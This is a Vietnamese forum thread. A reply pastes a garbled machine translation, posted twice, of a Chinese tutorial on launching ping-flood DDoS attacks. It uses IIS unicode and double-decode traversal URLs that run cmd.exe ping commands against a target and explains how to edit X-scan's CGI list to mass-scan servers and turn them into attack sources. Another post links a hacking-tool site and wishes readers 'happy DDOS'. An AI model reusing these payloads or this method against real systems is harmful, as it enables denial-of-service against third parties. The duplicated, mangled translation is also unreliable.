GAME ONLINE- tieng han` hoặc anh vô day

các bác co the cho em xin game nao` dang kí co down ma` free co phu` hop coi máy cho em la`( ram 256 cạp mang` hinh` 64) cam on trước

 

Realizes DDoS Ping using X-scan attacks

abu.

One, said from here,

As soon as starts, has no alternative but said two section influences strength very big DDoS the Ping bomb tool.

One is the snail bomb, one is AhBomb.

The snail bomb comes out is very early, has the loophole through the realization search the server completes the reserve, ha-ha, needs time, passes

Controls these has the loophole the server concentrates the Ping attack goal machine, causes the goal network speed to slow down, achieves the DDoS attack the goal.

AhBomb is one section more formidable attack tool which bigball writes, (ha-ha, here very thank him gives me infinite makes lithograph plates)



Said from the essence, the AhBomb realization method and the snail bomb has no difference, but because procedure compilation is very outstanding, multithreading

Writes separately special consummation, moreover lacks the province the parameter very possibly causes to be able to to bring by the aggressor the fatal attack.

Ha-ha

Or analyzes:

First starts from the snail bomb to mention

It has one search the process, searches the unicode loophole the main engine, then main engine address preservation in Server.dll document

In needs to implement attacks, reassignment all servers carries on attack.

I carry on the attack to one hypothesized goal 200.200.200.200 this ip, actually saves the data package which under the disposition intercepts:



Front part

Get /scripts/.. %c1%1c.. /winnt/system32/cmd.exe? /c

Is transfers the Windows server through the unicode code the order interpreter carries out the order.

Makes concrete the order which carries out is:

ping -l 65000 -n 500200.200.200.200

Here explains as follows:

ping one transmission test data package of examination network condition order

The -l 64000 transmissions contain by 64000 bytes data quantities ECHO data packages

-n 500 transmits 500 ECHO request data package

200.200.200.200 goals ip, ha-ha

Now looked is very clear, also with did not say.

　

These orders although are simple, but because ping order use only needs threshold user jurisdiction, but has the unicode loophole

The machine are again extremely many, this only then can cause the massive data to well up to one. Thereupon, hung.

　

　

What did we have a look AhBomb to do.



Front part

Get /scripts/.. %%255c.. %255cwinnt/system32/cmd.exe? /c

Is transfers the Windows server through the unicode code the order interpreter carries out the order, compared with new code therefore finds

The loophole server should be able to be more.

Makes concrete the order which carries out is:

ping 192.168.0.1 -t -i 255

Here explains as follows:

ping one transmission test data package of examination network condition order

-t does not stop the transmission ECHO data package, yes, does not stop

-i 255 TTL value supposes is 255 (is biggest)

192.168.0.1 goals, ha-ha

　

Carefully has a look its parameter and the snail bomb difference, specifically manifests in it certainly does not have the transmission large number according to the package, but merely is the transmission

Ordinary size package, because the very many networks equipment can filter the large package, the standard form instead only then can truly transmit the goal.

　

Here attaches: (TTL: The life, assigns the data newspaper the webpage quantity which loses by the router abandons before allows to pass. TTL is by transmits the main engine

The establishment, prevents the data package unceasingly forever will not terminate the circulation in the IP interconnection network. When retransmits the IP data package, request router

Reduces 1 to major general TTL.

　

　

Two, one section classical scanning tool X-scan

X-scan, the security focal point another strength does, from conception which as soon as starts, to the now entire opening -like structural design, this kind holds the spirit,

Isn't precisely we pursues?

Key mentions from its cgi scanning function

Selects in Tools CGI tabulates the maintenance function, may see listed from Windows to each edition Unix system

Possibly exists cgi loophole tabulate.



　

How is it confirms the server whether has the loophole?

The transfer order interpreter, carries out the dir order!

Trades your thought pattern, thinks with one hacker thought pattern

Transfers the dir order may, why can't we transfer other orders?

Ha-ha

This was the key point which I had to say

If I

/scripts/.. %255c.. %255cwinnt/system32/cmd.exe? /c+dir

For changes into

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.

、、、

ping -t -i 255 -w 5192.168.0.1

Why uses this order?

In order to is not filtered out by the network equipment, therefore does not transmit large number according to the package.

In order to can let our data package achieve the goal, we establish the TTL value are 255.

The -w 5 parameters, assign the overtime gap are 5 milliseconds, what no matter opposite party does return to the information is, does not stop send, ha-ha, this filters the ICMP package to some

Server or very is effective.

I open the cgi.lst document, manually edits content

At present will hit SP2 undergo the test later still can have the code loophole is the IIS-DECODE two codes loopholes.

I retained two most have the possibility the way storehouse, trimmed as follows:

Test goal ip is: 192.168.0.1



After opens in Tools CGI tabulates the maintenance chooses the new revision tabulates



　

To here, we so long as go to the big scale through X-scan the scanning cgi loophole, was allowed to implement to goal server DDoS Ping attacks.

To finally, Luo 嗦 one, under its practical any platform cgi scanning tool, slightly makes the revision, all may realize our goal.

Makes the explanation with X-scan is because of its splendor, as well as it is scanning the cgi loophole time is supports the proxy server connects.

、、、

　

abu.

China overcomes nature the net

 

Realizes DDoS Ping using X-scan attacks

abu.

One, said from here,

As soon as starts, has no alternative but said two section influences strength very big DDoS the Ping bomb tool.

One is the snail bomb, one is AhBomb.

The snail bomb comes out is very early, has the loophole through the realization search the server completes the reserve, ha-ha, needs time, passes

Controls these has the loophole the server concentrates the Ping attack goal machine, causes the goal network speed to slow down, achieves the DDoS attack the goal.

AhBomb is one section more formidable attack tool which bigball writes, (ha-ha, here very thank him gives me infinite makes lithograph plates)



Said from the essence, the AhBomb realization method and the snail bomb has no difference, but because procedure compilation is very outstanding, multithreading

Writes separately special consummation, moreover lacks the province the parameter very possibly causes to be able to to bring by the aggressor the fatal attack.

Ha-ha

Or analyzes:

First starts from the snail bomb to mention

It has one search the process, searches the unicode loophole the main engine, then main engine address preservation in Server.dll document

In needs to implement attacks, reassignment all servers carries on attack.

I carry on the attack to one hypothesized goal 200.200.200.200 this ip, actually saves the data package which under the disposition intercepts:



Front part

Get /scripts/.. %c1%1c.. /winnt/system32/cmd.exe? /c

Is transfers the Windows server through the unicode code the order interpreter carries out the order.

Makes concrete the order which carries out is:

ping -l 65000 -n 500200.200.200.200

Here explains as follows:

ping one transmission test data package of examination network condition order

The -l 64000 transmissions contain by 64000 bytes data quantities ECHO data packages

-n 500 transmits 500 ECHO request data package

200.200.200.200 goals ip, ha-ha

Now looked is very clear, also with did not say.

　

These orders although are simple, but because ping order use only needs threshold user jurisdiction, but has the unicode loophole

The machine are again extremely many, this only then can cause the massive data to well up to one. Thereupon, hung.

　

　

What did we have a look AhBomb to do.



Front part

Get /scripts/.. %%255c.. %255cwinnt/system32/cmd.exe? /c

Is transfers the Windows server through the unicode code the order interpreter carries out the order, compared with new code therefore finds

The loophole server should be able to be more.

Makes concrete the order which carries out is:

ping 192.168.0.1 -t -i 255

Here explains as follows:

ping one transmission test data package of examination network condition order

-t does not stop the transmission ECHO data package, yes, does not stop

-i 255 TTL value supposes is 255 (is biggest)

192.168.0.1 goals, ha-ha

　

Carefully has a look its parameter and the snail bomb difference, specifically manifests in it certainly does not have the transmission large number according to the package, but merely is the transmission

Ordinary size package, because the very many networks equipment can filter the large package, the standard form instead only then can truly transmit the goal.

　

Here attaches: (TTL: The life, assigns the data newspaper the webpage quantity which loses by the router abandons before allows to pass. TTL is by transmits the main engine

The establishment, prevents the data package unceasingly forever will not terminate the circulation in the IP interconnection network. When retransmits the IP data package, request router

Reduces 1 to major general TTL.

　

　

Two, one section classical scanning tool X-scan

X-scan, the security focal point another strength does, from conception which as soon as starts, to the now entire opening -like structural design, this kind holds the spirit,

Isn't precisely we pursues?

Key mentions from its cgi scanning function

Selects in Tools CGI tabulates the maintenance function, may see listed from Windows to each edition Unix system

Possibly exists cgi loophole tabulate.



　

How is it confirms the server whether has the loophole?

The transfer order interpreter, carries out the dir order!

Trades your thought pattern, thinks with one hacker thought pattern

Transfers the dir order may, why can't we transfer other orders?

Ha-ha

This was the key point which I had to say

If I

/scripts/.. %255c.. %255cwinnt/system32/cmd.exe? /c+dir

For changes into

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.

、、、

ping -t -i 255 -w 5192.168.0.1

Why uses this order?

In order to is not filtered out by the network equipment, therefore does not transmit large number according to the package.

In order to can let our data package achieve the goal, we establish the TTL value are 255.

The -w 5 parameters, assign the overtime gap are 5 milliseconds, what no matter opposite party does return to the information is, does not stop send, ha-ha, this filters the ICMP package to some

Server or very is effective.

I open the cgi.lst document, manually edits content

At present will hit SP2 undergo the test later still can have the code loophole is the IIS-DECODE two codes loopholes.

I retained two most have the possibility the way storehouse, trimmed as follows:

Test goal ip is: 192.168.0.1



After opens in Tools CGI tabulates the maintenance chooses the new revision tabulates



　

To here, we so long as go to the big scale through X-scan the scanning cgi loophole, was allowed to implement to goal server DDoS Ping attacks.

To finally, Luo 嗦 one, under its practical any platform cgi scanning tool, slightly makes the revision, all may realize our goal.

Makes the explanation with X-scan is because of its splendor, as well as it is scanning the cgi loophole time is supports the proxy server connects.

、、、

　

abu.

China overcomes nature the net


Đây là 1 website khá hay về DDOS serve , có rất nhiều công cụ cũ và mới .:http://www.hacker001.com/Soft/hacksoft/attack/List_11.html .ABom là 1 ví dụ điển hình để DDOS .
Chúc các bạn DDOS vui vẻ!!!

 

đúng là loạn cào cào cả lên mod đâu cả rồi.Chán thế àh.Để mấy tên này post bài thế này sao

 

Dài quá , ngắn 1 chút còn ráng đọc , dài we' chừng T_T , ông dịch sang tiếng vịt đi

ac. cái website ông đưa toàn là tiếng china T_T